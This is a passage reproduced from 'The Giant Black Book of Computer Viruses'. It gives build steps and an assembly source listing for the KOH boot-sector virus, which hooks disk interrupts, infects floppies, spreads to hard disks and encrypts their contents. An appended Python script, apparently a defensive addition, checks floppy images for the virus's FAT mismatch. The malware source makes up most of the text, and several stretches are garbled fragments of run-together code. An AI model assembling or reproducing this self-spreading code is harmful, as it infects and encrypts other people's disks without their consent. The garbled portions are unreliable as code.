
The Giant Black Book of Computer Viruses, Part 10


DOCUMENT INFORMATION

Basic information

Number of pages: 67
Size: 2.16 MB

Content

Legal Warning

As of the date of this writing, the KOH virus is illegal to export in executable form from the US. If you create an executable of it from the code in this book, and export it, you could be subject to immediate confiscation of all your property without recourse, and possibly also to jail after a trial. There is, however, no restriction (at present) against exporting this code in printed form, as in this book.

The KOH Source

KOH consists of several modules which must all be present on the disk to assemble it properly. KOH.ASM is the main file, which includes the loader, the boot sector, the interrupt handlers, hard disk encryptor, etc. KOHIDEA.ASM is an include file that contains the code for the IDEA algorithm. FATMAN.ASM is the FAT manager routines. These differ slightly from the FATMAN.ASM originally listed with the BBS virus because the FAT is sometimes encrypted. The PASS.ASM include file contains the pass phrase entry routines, and RAND.ASM contains the pseudo-random number generator.

To build the KOH virus, just assemble KOH.ASM, preferably using TASM. Then, run the KOH.COM file you produce to infect and encrypt a diskette in the A: drive (or specify B: on the command line if you’d rather use your B: drive). To migrate KOH to the hard disk, just boot from the infected floppy. KOH will ask if you want it to migrate to the hard disk; just answer yes.

When you assemble KOH, make sure the code does not overrun the scratchpad buffer where the disk is read into and written from. If you do, it will cause KOH to crash. Since KOH is highly optimized and crunched into the minimum amount of space available to it, an assembler that did not optimize the assembly could cause code to overflow into this buffer, which is located just below the boot sector.

The KOH.ASM Source

;Source Listing for the Potassium Hydroxide virus.
; (C) 1995 by The King of Hearts, All rights reserved.
;Licensed to American Eagle Publications, Inc. for use in The Giant Black Book
;of Computer Viruses
;
;Version 1.00
;       Initial release - beta only
;Version 1.01
;       Upgrade to fix a number of bugs in 1.00, gets rid of casual encryption
;       and encrypts only one partition on disk, not whole disk, instant HD
;       password change.
;Version 1.02
;       Fixes failure of SETUP_HARD on some disks because the INT 41H vector
;       doesn't always point to a proper drive parameter table.
;       Fixes problem with some floppy drives that messes up 2nd FAT table.
;Version 1.03
;       Fixes inability to infect some floppy disks that are almost full but not
;       quite.

;Both of the following should always be odd for this to work right.
BUF_SIZE        EQU     9               ;Internal disk buffer size, in sectors
VIR_SIZE        EQU     9               ;Virus size, less boot sector, in sectors

VIRUS   SEGMENT BYTE
        ASSUME  CS:VIRUS,DS:VIRUS,ES:VIRUS,SS:VIRUS

        ORG     100H

;*******************************************************************************
;* VIRUS LOADER FOR A DISK IN DRIVE A: *
;*******************************************************************************

START:
        mov     ah,9
        mov     dx,OFFSET WELCOME_MSG
        int     21H
        xor     ax,ax
        mov     ds,ax
        mov     si,13H*4                ;save the old int 13H vector
        mov     di,OFFSET OLD_13H
        movsw
        movsw
        mov     ax,OFFSET INT_13H       ;and set up new interrupt 13H
        mov     bx,13H*4                ;which everybody will have to
        mov     ds:[bx],ax              ;use from now on
        mov     ax,es
        mov     ds:[bx+2],ax
        push    cs
        pop     ds                      ;restore ds to here
        call    ENCRYPT_STRINGS
        mov     [HPP],OFFSET FDHPP      ;floppy password
        call    MASTER_PASS             ;create a new password
        mov     bx,80H                  ;check parameter
        mov     al,[bx]
        cmp     al,2
        jc      PAR1                    ;no parameter, assume a: drive
        mov     al,[bx+2]               ;else get first letter
        or      al,20H                  ;make it lower case
        cmp     al,61H
        jc      PAR1                    ;must be "a" or "b", else exit
        cmp     al,63H
        jnc     PAR1
        sub     al,61H                  ;subtract "a"
        mov     dl,al                   ;and put drive letter here
        add     BYTE PTR [SUCCESS_MSG+17],al
        jmp     SHORT PAR2
PAR1:   mov     dl,0
PAR2:   mov     ax,0201H
        mov     bx,OFFSET DUMMY_BUF
        mov     cx,1
        mov     dh,0
        int     13H
        jnc     SUCCESS_LOAD
        cmp     ah,6
        je      SUCCESS_LOAD
ABORT_LOAD:
        mov     dx,OFFSET ABORT_MSG
        mov     ah,9
        int     21H
        jmp     SHORT EXIT_NOW
SUCCESS_LOAD:
        mov     dx,OFFSET SUCCESS_MSG
        mov     ah,9
        int     21H
EXIT_NOW:
        xor     ax,ax
        mov     ds,ax
        mov     ax,WORD PTR es:[OLD_13H]        ;restore old interrupt 13H
        mov     bx,13H*4
        mov     ds:[bx],ax
        mov     ax,WORD PTR es:[OLD_13H+2]
        mov     ds:[bx+2],ax
        mov     ax,4C00H
        int     21H

;This routine encrypts all strings in the virus
ENCRYPT_STRINGS:
        mov     bx,OFFSET STRING_LIST
ENCLP:  push    bx
        mov     si,[bx]
        or      si,si
        jz      ESTREND
        call    ENCRYPT_STRING
        pop     bx
        add     bx,2
        jmp     ENCLP
ESTREND:pop     bx
        ret

;This routine encrypts a string in the virus
ENCRYPT_STRING:
        mov     [RAND_SEED],si
ES1:    call    GET_RANDOM
        mov     al,[si]
        xor     [si],ah
        inc     si
        or      al,al
        jnz     ES1
ESEX:   ret

ABORT_MSG       DB      'Initial load failed aborting.$'
SUCCESS_MSG     DB      'Load successful. A: now encrypted with KOH.$'

STRING_LIST     DW      OFFSET SURE
                DW      OFFSET ENCRYPT_QUERY1
                DW      OFFSET PW_EXPLAIN
                DW      OFFSET STOP_MSG
                DW      OFFSET FD_PWASK
                DW      OFFSET HD_PWCHASK
                DW      OFFSET FD_PWCHASK
                DW      OFFSET PW_HDEX
                DW      OFFSET HARD_ASK
                DW      OFFSET ENC_PASS1
                DW      OFFSET DEC_PASS
                DW      OFFSET ENC_PASS2
                DW      OFFSET BAD_PASS
                DW      OFFSET ALL_DONE
                DW      OFFSET NO_ROOM
                DW      OFFSET UPDATE_MSG
                DW      OFFSET CYL_LABEL
                DW      OFFSET HD_LABEL
                DW      0

DUMMY_BUF       DB      512 dup (?)

;*******************************************************************************
;* BIOS DATA AREA *
;*******************************************************************************

        ORG     413H

MEMSIZE         DW      640             ;size of memory installed, in KB

WELCOME_MSG     DB      'Potassium Hydroxide (KOH) Version 1.03 Loader by the King of Hearts',0DH,0AH
                DB      '(C) 1995 American Eagle Publications, Inc. All rights reserved.',0DH,0AH,0AH
                DB      'This loader will migrate the KOH encryption system to a floppy disk of your',0DH,0AH
                DB      'choice (A or B) as specified on the command line. After encrypting, you must',0DH,0AH
                DB      'boot from that floppy to activate the decryption, or to migrate to a hard disk.',0DH,0AH
                DB      'This program uses the IDEA algorithm (implementation not developed in the US)',0DH,0AH
                DB      'in conjunction with a pass phrase up to 128 bytes long. Floppies and hard disks',0DH,0AH
                DB      'have their own separate pass phrases. The floppy uses it directly. The hard',0DH,0AH
                DB      'disk is encrypted with a 16 byte random number, which is decrypted with its',0DH,0AH
                DB      'pass phrase. Three commands can be activated when KOH is resident:',0DH,0AH,0DH,0AH
                DB      ' Ctrl-Alt-K allows one to change the pass phrases, floppy and hard disk.',0DH,0AH,0AH
                DB      ' Ctrl-Alt-O toggles floppy auto-migrate. When turned on, a "+" is displayed',0DH,0AH
                DB      ' and KOH will automatically encrypt every floppy it sees. When',0DH,0AH
                DB      ' turned off a "-" is displayed, and floppies are not touched.',0DH,0AH,0AH
                DB      ' Ctrl-Alt-H uninstalls KOH from the disk that was booted from.',0DH,0AH,0AH
                DB      'For more info see KOH.DOC!',0DH,0AH,0AH,'$'

;*******************************************************************************
;* VIRUS CODE STARTS HERE *
;*******************************************************************************

        ORG     7C00H - 512*VIR_SIZE - 512*BUF_SIZE - 48

LOCAL_STACK:

FDHPP           DB      16 dup (0)      ;floppy disk hashed pass phrase
HDKEY           DB      16 dup (0)      ;hard disk key, used to encrypt/decrypt sectors
HDHPP           DB      16 dup (0)      ;hard disk hashed pass phrase, to encrypt HDKEY

        ORG     7C00H - 512*VIR_SIZE - 512*BUF_SIZE

IDEAVIR:                                ;A label for the beginning of the virus

;*******************************************************************************
;* INTERRUPT 13H HANDLER *
;*******************************************************************************
;This routine must intercept reads and writes to the floppy disk and encrypt/
;decrypt them as necessary.

OLD_13H         DD      ?               ;Old interrupt 13H vector goes here
OLD_9           DD      ?               ;Old interrupt 9 vector goes here

;The following calls the original rom bios INT 13. DO_INT13 just calls it once.
;DO_INT13E does error handling, calling it once, and if an error, doing a
;disk reset, and then calling it again, returning c if there is an error.
DO_INT13E:
        push    ax
        pushf
        call    DWORD PTR cs:[OLD_13H]
        jc      DI132
        add     sp,2                    ;exit now if 1st call was ok
        ret
DI132:  mov     ah,0                    ;1st call bad, reset & try again
        pushf
        call    DWORD PTR cs:[OLD_13H]
        pop     ax
DO_INT13:                               ;bare call entry point
        pushf
        call    DWORD PTR cs:[OLD_13H]
        ret

INT_13H:
        sti
        cmp     ah,2                    ;we want to intercept reads
        jz      READ_FUNCTION
        cmp     ah,3                    ;and writes to all disks
        jz      WRITE_FUNCTION
        cmp     ah,5                    ;if a FORMAT function is called
        jnz     I131                    ;set a flag
        mov     BYTE PTR cs:[FORMAT_FLAG],1
        jmp     SHORT I13R
I131:   cmp     ah,16H                  ;likewise for change-line check
        jnz     I13R
        mov     BYTE PTR cs:[MOTOR_FLAG],1
I13R:   jmp     DWORD PTR cs:[OLD_13H]

;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 3,
;(Write). If an attempt is made to write any sectors except the boot sector,
;this function must encrypt the data to write, write it, and then decrypt
;everything again. If the boot sector is written, it must not be encrypted!
WRITE_FUNCTION:
        mov     BYTE PTR cs:[ACTIVE],1
        mov     cs:[CURR_DISK],dl       ;set this with current disk no
        mov     cs:[SECS_READ],al
        call    IS_ENCRYPTED
        jz      WF1
        cmp     dx,80H                  ;write protect the virus here
        jnz     WF0
        cmp     cx,VIR_SIZE+4
        jc      WF3
WF0:    call    ENCRYPT_DATA
WF1:    call    DO_INT13
        pushf
        call    IS_ENCRYPTED
        jz      WF2
        call    DECRYPT_DATA
WF2:    popf
WF3:    mov     BYTE PTR cs:[ACTIVE],0
        retf    2                       ;return and pop flags off stack

;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 2,
;(Read). If an attempt is made to read any sectors except the boot sector,
;this function must allow the read to proceed normally, and then decrypt
;everything read except the boot sector.
READ_FUNCTION:
        mov     BYTE PTR cs:[ACTIVE],1
        mov     cs:[SECS_READ],al
        mov     cs:[CURR_DISK],dl       ;set this with current disk no
        mov     cs:[OLD_SS],ss
        mov     cs:[OLD_SP],sp
        cli
        push    cs
        pop     ss
        mov     sp,OFFSET LOCAL_STACK
        sti
        cmp     dl,80H                  ;skip infect for hard drives
        jnc     DO_READ
        call    INFECT_FLOPPY
        cmp     BYTE PTR cs:[CHANGE_FLAG],0     ;was change flag set in INFECT_FLOPPY?
        jz      DO_READ                 ;no, continue with read
        mov     BYTE PTR cs:[CHANGE_FLAG],0     ;yes, reset flag
        mov     ax,600H                 ;set ah=6, al=0, c on
        stc
        pushf                           ;and exit now
        jmp     SHORT DONE_DECRYPT
DO_READ:
        call    DO_INT13
        pushf
        jnc     DOREAD1                 ;exit on error
        cmp     ah,11H
        jz      DOREAD1
        or      al,al
        jz      DONE_DECRYPT
        mov     cs:[SECS_READ],al
DOREAD1:call    IS_ENCRYPTED            ;is disk encrypted?
        jz      DONE_DECRYPT            ;no, don't try to decrypt it
        call    DECRYPT_DATA
DONE_DECRYPT:
        popf
        cli
        mov     ss,cs:[OLD_SS]
        mov     sp,cs:[OLD_SP]
        sti
        jmp     WF3                     ;return and pop flags off stack

;This routine determines if CURR_DISK is encrypted or not. It returns with
;Z set if it isn't encrypted, and reset if it is. It is assumed that dl
;contains the current disk # on entry. No registers are changed.
IS_ENCRYPTED:
        cmp     dl,80H                  ;is it a hard drive?
        jnc     IE_HD                   ;yes, check it specially
        push    cx
        push    ax
        cmp     BYTE PTR cs:[FORMAT_FLAG],1
        jz      IEE
        mov     cl,dl
        mov     al,cs:[CRYPT_FLAG]
        shr     al,cl
        and     al,1
IEE:    pop     ax
        pop     cx
        ret
IE_HD:  jnz     IEZ                     ;drive other than c: ?
        push    ax
        mov     al,cs:[HD_CRYPT]        ;see if HD is encrypted
        or      al,al                   ;and set flag properly
        jz      IEHDE
        push    cx
        push    dx                      ;see if we're in right partition
        push    ds
        push    cs
        pop     ds
        call    DECODE_SECTOR
        cmp     cx,[FIRST_CYL]
        jc      IEZ2                    ;cx<first cyl, exit with z set
        jne     IEH2
        cmp     dh,[FIRST_HEAD]
        jc      IEZ2                    ;cx=first cyl, dh<first head, exit z
        jne     IEH2
        cmp     dl,[FIRST_SEC]
        jc      IEZ2                    ;cx=1st cyl, dh=1st head, dl<1st sec
IEH2:   cmp     cx,[LAST_CYL]
        jg      IEZ2                    ;cx>last cyl, exit with z set
        jne     IEH3
        cmp     dh,[LAST_HEAD]
        jg      IEZ2                    ;cx=last cyl, dh>last head
        jne     IEH3
        cmp     dl,[LAST_SEC]
        jg      IEZ2                    ;cx=last cyl, dh=last head, dl>last sec
        mov     al,1                    ;all ok, we're encrypted
        or      al,al
IEH3:   pop     ds
        pop     dx
        pop     cx
IEHDE:  pop     ax
        ret
IEZ2:   pop     ds
        pop     dx
        pop     cx
        pop     ax
IEZ:    push    ax                      ;return with Z set
        xor     al,al
        pop     ax
        ret

;This routine decrypts using IDEA. On entry, ax, es:bx, cx and dx must be set
;up just like they are for the INT 13. All registers are preserved on this
;call. This routine does not change the stack.
DECRYPT_DATA:
        mov     BYTE PTR cs:[cfb_dc_idea],0FFH
        jmp     SHORT CRYPT_DATA

;This routine encrypts using IDEA. On entry, ax, es:bx, cx and dx must be set
;up just like they are for the INT 13. All registers are preserved on this
;call. This routine does not change the stack.
ENCRYPT_DATA:
        mov     BYTE PTR cs:[cfb_dc_idea],0
CRYPT_DATA:
        cld
        push    ds
        push    es
        push    di                      ;save everything now
        push    si
        push    dx
        push    cx
        push    bx
        push    ax
        push    cs
        pop     ds
        mov     al,[SECS_READ]
        mov     [HPP],OFFSET FDHPP
        cmp     dl,80H
        jc      ED1
        mov     [HPP],OFFSET HDKEY
        call    SET_HARD
ED1:    or      dh,dh                   ;is it head 0?
        jnz     ED2                     ;nope, go encrypt
        cmp     cx,1                    ;is it track 0, sector 1?
        jz      ED3                     ;nope, go encrypt
ED2:    cmp     dl,80H
        jc      STRONG_CRYPT
        cmp     dh,[BSLOC_DH]
        jnz     STRONG_CRYPT
        cmp     cx,[BSLOC_CX]
        jnz     STRONG_CRYPT
ED3:    inc     cl
        dec     al
        add     bx,512
STRONG_CRYPT:
        xor     dl,dl
        or      al,al
        jz      WR_EN2
        mov     si,bx
WR_EN1: push    ax
        mov     [IV],dx
        mov     [IV+2],cx
        xor     ax,ax
        mov     [IV+4],ax
        mov     [IV+6],ax
        push    dx
        push    cx
        push    si
        call    initkey_idea
        pop     si
        push    si
        push    si
        call    ideasec
        pop     si
        pop     cx
        pop     dx
        pop     ax
        cmp     BYTE PTR [CURR_DISK],80H
        jnc     WR_EN15
        inc     cl                      ;on floppies, we just inc cl
        jmp     SHORT WR_EN17
WR_EN15:call    NEXT_SEC                ;on HD, reads can jump hds and trks
        jnc     WR_EN2                  ;done with disk, exit
WR_EN17:add     si,512
        dec     al                      ;loop until everything is encrypted
        jnz     WR_EN1
WR_EN2:                                 ;restore registers
        pop     ax
        pop     bx
        pop     cx
        pop     dx
        pop     si
        pop     di
        pop     es
        pop     ds
        ret

;This routine increments cx/dx to the next sector. On floppies, it just
;increments cl, the sector number. On HD's, it must also handle head and track
;number. This includes the AMI extension to handle more than 1024 cylinders.
;Returns nc if it is past the last sector on disk.
NEXT_SEC:
        push    cx
        and     cl,00111111B
        inc     cx
        cmp     cl,BYTE PTR [SECS_PER_TRACK]
        pop     cx
        jg      NS1
        inc     cl
        jmp     SHORT NEXT_SEC_EXIT
NS1:    and     cl,11000000B
        inc     cl
        push    dx
        and     dh,00111111B
        inc     dh
        cmp     dh,BYTE PTR [HEADS]
        pop     dx
        jge     NS2
        inc     dh
        jmp     SHORT NEXT_SEC_EXIT
NS2:    and     dh,11000000B
        add     ch,1
        jnc     NEXT_SEC_EXIT
        add     cl,64
        jnc     NEXT_SEC_EXIT
        add     dh,64
NEXT_SEC_EXIT:
        cmp     BYTE PTR [CURR_DISK],80H
        jc      FLOPPY_EX
        push    cx
        push    dx
        call    DECODE_SECTOR
        cmp     cx,[LAST_CYL]
        jne     NSE
        cmp     dh,[LAST_HEAD]
        jne     NSE
        cmp     dl,[LAST_SEC]
        jne     NSE
        stc                             ;ok if dl=last sector
NSE:    pop     dx
        pop     cx
        ret
FLOPPY_EX:
        cmp     ch,BYTE PTR [TRACKS]    ;set c if ch < TRACKS
        ret

;This routine does all that is needed to infect a floppy disk. It determines
;whether the disk is infected, and if so, attempts an infect.
INFECT_FLOPPY:
        push    ds
        push    es
        push    di                      ;save everything now
        push    si
        push    dx
        push    cx
        push    bx
        push    ax
        mov     ax,cs
        mov     ds,ax
        mov     es,ax
        mov     ax,WORD PTR [DR_FLAG]
        push    ax
        mov     ax,WORD PTR [BS_SECS_PER_TRACK]
        push    ax
        mov     ax,WORD PTR [BS_HEADS]
        push    ax
        mov     ax,WORD PTR [BS_SECTORS_ON_DISK]
        push    ax
        xor     ax,ax                   ;set drive flag = 0 for any
        mov     WORD PTR [DR_FLAG],ax   ;floppies infected
        mov     [HPP],OFFSET FDHPP      ;use floppy password
        call    SHOULD_INFECT           ;should we infect the floppy?
        jnz     IF_END
        mov     cl,dl                   ;get current disk number
        mov     al,0FEH
        rol     al,cl                   ;assume we're not encrypted now,
        and     [CRYPT_FLAG],al         ;so reset the crypt flag
        mov     ax,0201H                ;move boot sector into SCRATCHBUF
        mov     bx,OFFSET SCRATCHBUF
        mov     cx,1
        mov     dh,0
        int     40H                     ;read boot sector
        jnc     INF2                    ;read was ok
        cmp     ah,6                    ;change flag set if ah=6
        jnz     INF1
        mov     [CHANGE_FLAG],ah        ;so save it here
INF1:   mov     ax,0201H
        int     40H                     ;try again
        jc      IF_END
INF2:   mov     bx,OFFSET SCRATCHBUF+200H       ;now read first fat sector
        inc     cx
        mov     ax,201H
        int     40H
        mov     al,BYTE PTR [SCRATCHBUF+15H]    ;get boot sector ID
        xor     al,BYTE PTR [SCRATCHBUF+200H]   ;xor with FAT ID
        jnz     INF5                    ;not same, encrypted, so skip
        cmp     WORD PTR [SCRATCHBUF+201H],0FFFFH       ;better be FFFF
        jnz     INF5                    ;else encrypted
        cmp     [FD_INFECT],1           ;should we infect??
        jz      INF55                   ;nope, don't encrypt
        call    INIT_FAT_MANAGER        ;set up disk parameters
        call    ENCRYPT_FLOPPY          ;and encrypt the disk
        jc      IF_END                  ;if error, exit and don't infect
        mov     ax,0201H                ;re-load boot sec after encrypt
        mov     cx,1
        mov     dh,0
        mov     dl,[CURR_DISK]
        mov     bx,OFFSET SCRATCHBUF
        call    DO_INT13
        jc      IF_END                  ;exit if an error (shouldn't be)
INF5:   call    SET_CRYPT_FLAG          ;now encrypted, set this flag
INF55:  cmp     [FD_INFECT],1
        jz      IF_END
        call    IS_VBS                  ;is viral boot sector there?
        jnz     INF6                    ;nope, go infect it
        jmp     SHORT IF_END            ;else exit
INF6:   call    INIT_FAT_MANAGER        ;initialize disk parameters
        call    MOVE_VIRUS_FLOPPY       ;and infect, if possible
IF_END: pop     ax
        mov     WORD PTR [BS_SECTORS_ON_DISK],ax
        pop     ax
        mov     WORD PTR [BS_HEADS],ax
        pop     ax
        mov     WORD PTR [BS_SECS_PER_TRACK],ax
        pop     ax
        mov     WORD PTR [DR_FLAG],ax
        pop     ax
        pop     bx
        pop     cx
        pop     dx

[...]

... bytes of boot sector + 3ADH ;to viral boot sector at end ;so boot works right on rep movsb ;floppies too pop call mov cx CLUST_TO_ABSOLUTE ;set cx,dx up with trk, sec, hd info WORD PTR [VIRCX - OFFSET BOOT_START + OFFSET SCRATCHBUF + mov BYTE PTR [VIRDH - OFFSET BOOT_START + OFFSET SCRATCHBUF + ;save in viral bs BYTE PTR [CHANGE_FLAG - OFFSET BOOT_START + OFFSET...

[...]

... PTR [REMOVE],0FFH
        mov     [HPP],OFFSET HDKEY
        call    EHD_SUBR                ;decrypt the hard disk(s)
        mov     BYTE PTR [REMOVE],0
HUR:    cld
        mov     di,OFFSET INT_13H       ;reroute interrupts
        call    KILL_INT                ;back to old handlers
        mov     ax,OFFSET OLD_13H
        stosw
        mov     di,OFFSET INT_9
        call    KILL_INT
        mov     ax,OFFSET OLD_9
        stosw
        mov     si,OFFSET ALL_DONE      ;all done, say so
        call    DISP_STRING
        jmp     KBEX
;configuration...

[...]

... beginning of disk
;copies of fat on disk
;number of entries in root directory
;total number of sectors on disk
;disk format ID
;number of sectors per FAT
;number of sectors per track (one head)
;number of heads on disk

;The following are the CX and DH values to indicate where the rest of the
;virus is located. These are set by INFECT_FLOPPY, as needed by INT 13H
VIRCX           DW      ?
VIRDH           DB      ?
HPP             DW      OFFSET FDHPP...

[...]

        pop     si
        pop     di
        pop     es
        pop     ds
        ret                             ;return with flags set properly

;Set the CRYPT_FLAG for the current disk
SET_CRYPT_FLAG:
;if we get here, drive is encrypted
;so set flag accordingly
        mov     cl,[CURR_DISK]
        mov     al,1
        shl     al,cl
        or      [CRYPT_FLAG],al
        ret

;This routine determines whether we should infect now. It signals time to
;infect only if the drive motor is off. If the...

[...]

;... one sector of encryption for hard disk. This preserves all registers
... ax bx cx dx si
        mov     si,OFFSET CYL_LABEL
        call    DISP_STRING
        call    DECODE_SECTOR
        push    dx
        mov     ax,cx
        call    DISP_DECIMAL
        mov     si,OFFSET HD_LABEL
        call    DISP_STRING
        pop     dx
        mov     al,dh
        xor     ah,ah
        call    DISP_DECIMAL
        mov     ax,0E0DH
        int     10H
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        ret

;Display the decimal...

[...]

... HDHPP ax,239BH di,OFFSET IV ax ax ;only place this gets used ;set up IV to some misc number
        inc     ax
        stosw
        call    initkey_idea
        mov     si,OFFSET SCRATCHBUF
        push    si
        call    ideasec                 ;encrypt the buffer
        ret

;This routine installs interrupt 9 and 13 handlers
INSTALL_INT_HANDLERS:
        xor     ax,ax
        mov     ds,ax
        mov     si,9*4
        mov     di,OFFSET OLD_9
        movsw
        movsw
        mov     si,13H*4                ;save the old int 13H...

[...]

;first cyl, hd, sec of
;active partition
;last cyl, hd, sec of
;active partition
BOOT:   cli                             ;interrupts off
        xor     ax,ax                   ;set up segment registers
        mov     ss,ax
        mov     ds,ax
        mov     es,ax
        mov     sp,OFFSET BOOT_START    ;and stack pointer
        sti
        mov     cl,6                    ;prep to convert kb's to seg
        mov     ax,[MEMSIZE]            ;get size of memory available
shl sub mov sub GO_RELOC: mov mov mov rep push mov...

[...]

;... above, the fact that this routine sets cx=0
;is important
IS_HARD_THERE:
        push    ds
        xor     cx,cx
        mov     ds,cx
        mov     bx,475H                 ;Get hard disk count from bios
        mov     al,[bx]                 ;put it in al
        pop     ds
        or      al,al                   ;and see if al=0 (no drives)
        ret

;*******************************************************************************
;Determine whether the boot sector in SCRATCHBUF is the viral...

[...]

;... in memory 0=not there
TRACKS          DW      ?               ;number of tracks on disk

;The following must be set prior to calling INIT_FAT_MANAGER or using any of
;these routines
CURR_DISK       DB      ?               ;current disk drive

;This routine is passed the number of contiguous free sectors desired in bx,
;and it attempts to locate them on the disk. If it can, it returns the FAT
;entry number in cx, and the C flag reset. If there aren't that...

[...]

;... bits 1st
;and move them down
;for even entries, just AND low 12 bits
;if offset=511, we cross a sec boundary
;if not exit,
;else fake as if it is occupied

;This routine reads the FAT sector number requested in al. The first is 1,
;second is 2, etc. It updates the CURR_FAT_SEC variable once the sector has
;been successfully loaded
GET_FAT_SECTOR:
        inc     ax                      ;inc al
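At INF2, INFECT_FLOPPY treats a floppy as already encrypted when the media byte at boot-sector offset 15H differs from the first FAT byte, or when the next two FAT bytes are not FFFF. The same consistency test can be used to triage floppy images; the Python below is an added example, not code from the book. The names `fat_check` and `make_image` are hypothetical, the sample images are constructed, and locating the FAT from the BPB reserved-sector count (instead of the listing's fixed sector 2) is a generalization.

```python
import struct

SECTOR = 512  # bytes per sector on the floppies the listing targets


def fat_check(image: bytes) -> str:
    """Apply the boot-sector/FAT consistency test to a raw floppy image.

    Returns:
      "plain"      first FAT sector starts with <media byte> FF FF
      "suspect"    FAT header does not match (encrypted, damaged or not FAT12)
      "unreadable" image too short or BPB fields implausible
    """
    if len(image) < 2 * SECTOR:
        return "unreadable"
    boot = image[:SECTOR]
    (bytes_per_sector,) = struct.unpack_from("<H", boot, 0x0B)
    (reserved,) = struct.unpack_from("<H", boot, 0x0E)
    media = boot[0x15]                       # same byte the listing reads at +15H
    if bytes_per_sector != SECTOR or reserved == 0:
        return "unreadable"
    fat_off = reserved * SECTOR              # first FAT follows the reserved sectors
    if len(image) < fat_off + 3:
        return "unreadable"
    fat = image[fat_off:fat_off + 3]
    # Listing's test: (media XOR FAT[0]) == 0 and word at FAT+1 == FFFFH
    if (fat[0] ^ media) == 0 and fat[1:3] == b"\xff\xff":
        return "plain"
    return "suspect"


def make_image(media: int = 0xF0, fat_head: bytes = b"\xf0\xff\xff") -> bytes:
    """Build a constructed two-sector test image: boot sector plus first FAT sector."""
    boot = bytearray(SECTOR)
    struct.pack_into("<H", boot, 0x0B, SECTOR)   # bytes per sector
    boot[0x0D] = 1                               # sectors per cluster
    struct.pack_into("<H", boot, 0x0E, 1)        # one reserved sector
    boot[0x15] = media                           # media descriptor
    boot[510:512] = b"\x55\xaa"
    fat = bytearray(SECTOR)
    fat[:3] = fat_head
    return bytes(boot + fat)


if __name__ == "__main__":
    samples = {
        "clean 1.44MB-style": make_image(),
        "scrambled FAT": make_image(fat_head=bytes([0x3C, 0x91, 0x07])),
        "truncated": b"\x00" * 100,
    }
    for name, img in samples.items():
        print(f"{name:20s} {fat_check(img)}")
```

A "suspect" result is a triage signal only: a damaged FAT or a non-FAT12 volume fails the same test, so confirm against the boot sector contents before drawing conclusions.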

Date posted: 14/08/2014, 18:22
